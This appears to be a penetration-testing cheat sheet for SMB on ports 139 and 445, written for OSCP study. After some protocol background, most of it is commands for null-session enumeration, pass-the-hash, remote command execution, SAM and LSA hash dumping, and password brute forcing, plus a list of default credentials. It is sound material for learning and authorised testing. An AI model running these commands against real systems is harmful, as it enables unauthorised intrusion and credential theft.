SMB - Port 139 445
Become VeryLazyTech member! 🎁
Follow us on:
✖ Twitter @VeryLazyTech.
👾 Github @VeryLazyTech.
📜 Medium @VeryLazyTech.
📺 YouTube @VeryLazyTech.
📩 Telegram @VeryLazyTech.
🕵️♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚
Basic info
Port 139, commonly associated with the Server Message Block (SMB) protocol over NetBIOS, plays a key role in enabling file and printer sharing, network authentication, and various types of communication within local area networks (LANs). Leveraging NetBIOS (Network Basic Input/Output System), this port facilitates inter-computer communication by supporting session establishment, data transmission, and the management of networked resources like shared files and printers. Historically integral to Windows networking, Port 139 enables SMB, an essential protocol that underpins shared access to files, printers, and even serial ports across networks.
Technically, Port 445 is referred to as ‘SMB over IP’, distinguishing it from Port 139, which is known as ‘NBT over IP’. The term SMB stands for ‘Server Message Blocks’, a protocol also commonly referred to as the Common Internet File System (CIFS). As an application-layer network protocol, SMB/CIFS facilitates shared access to files, printers, and serial ports while enabling seamless communication between devices on a network.
In modern Windows systems, SMB operates directly over TCP/IP through Port 445, bypassing the need for NetBIOS. This direct implementation enhances efficiency and reduces dependencies on older protocols. On the other hand, legacy systems or specific configurations may still employ Port 139, which signifies SMB functioning in conjunction with NetBIOS over TCP/IP. The distinction between these ports underscores the evolution of network protocols, with Port 445 representing a streamlined approach to resource sharing in contemporary networks.
SMB
The Server Message Block (SMB) protocol, operating in a client-server model, is designed for regulating access to files, directories, and other network resources like printers and routers. Primarily utilized within the Windows operating system series, SMB ensures backward compatibility, allowing devices with newer versions of Microsoft's operating system to seamlessly interact with those running older versions. Additionally, the Samba project offers a free software solution, enabling SMB's implementation on Linux and Unix systems, thereby facilitating cross-platform communication through SMB.
Shares, representing arbitrary parts of the local file system, can be provided by an SMB server, making the hierarchy visible to a client partly independent from the server's actual structure. The Access Control Lists (ACLs), which define access rights, allow for fine-grained control over user permissions, including attributes like execute, read, and full access. These permissions can be assigned to individual users or groups, based on the shares, and are distinct from the local permissions set on the server.
IPC$ Share
Access to the IPC$ share can be obtained through an anonymous null session, allowing for interaction with services exposed via named pipes. The utility enum4linux is useful for this purpose. Utilized properly, it enables the acquisition of:
Information on the operating system
Details on the parent domain
A compilation of local users and groups
Information on available SMB shares
The effective system security policy
This functionality is critical for network administrators and security professionals to assess the security posture of SMB (Server Message Block) services on a network. enum4linux provides a comprehensive view of the target system's SMB environment, which is essential for identifying potential vulnerabilities and ensuring that the SMB services are properly secured.
enum4linux -a target_ipThe above command is an example of how enum4linux might be used to perform a full enumeration against a target specified by target_ip.
Enumeration
SMB server version
To look for possible exploits to the SMB version it important to know which version is being used. If this information does not appear in other used tools, you can:
msfconsole
use module _auxiliary/scanner/smb/smb_versionOr this script:
#!/bin/sh
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>
#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139,445 [[domain/]username[:password]@]<targetName or address>
#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135,139,445 [[domain/]username[:password]@]<targetName or address>Users, Groups & Logged On Users
This info should already being gathered from enum4linux and enum4linux-ng
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]
ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "Metasploit - Enumerate local users
use auxiliary/scanner/smb/smb_lookupsid
set rhosts domain.local
runShared Folders Enumeration
List shared folders
It is always recommended to look if you can access to anything, if you don't have credentials try using null credentials/guest user.
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list
crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest userConnect/List a shared folder
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-HashCrackmapexec
crackmapexec can execute commands abusing any of mmcexec, smbexec, atexec, wmiexec being wmiexec the default method. You can indicate which option you prefer to use with the parameter --exec-method:
apt-get install crackmapexec
crackmapexec smb 192.168.10.11 -u Administrator -p 'password' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'password' -x whoami #Excute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-HashBrute Force
nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P wordlist.txt <IP> smb -t 1Common Credentials
Username(s)
Common passwords
(blank)
(blank)
guest
(blank)
Administrator, admin
(blank), password, administrator, admin
arcserve
arcserve, backup
tivoli, tmersrvd
tivoli, tmersrvd, admin
backupexec, backup
backupexec, backup, arcada
test, lab, demo
password, test, lab, demo
Post Exploitation
The default config of a Samba server is usually located in /etc/samba/smb.conf and might have some dangerous configs:
Setting
Description
browseable = yes
Allow listing available shares in the current share?
read only = no
Forbid the creation and modification of files?
writable = yes
Allow users to create and modify files?
guest ok = yes
Allow connecting to the service without using a password?
enable privileges = yes
Honor privileges assigned to specific SID?
create mask = 0777
What permissions must be assigned to the newly created files?
directory mask = 0777
What permissions must be assigned to the newly created directories?
logon script = script.sh
What script needs to be executed on the user's login?
magic script = script.sh
Which script should be executed when the script gets closed?
magic output = script.out
Where the output of the magic script needs to be stored?
The command smbstatus gives information about the server and about who is connected.
Learn & practice For the OSCP.
Last updated
Was this helpful?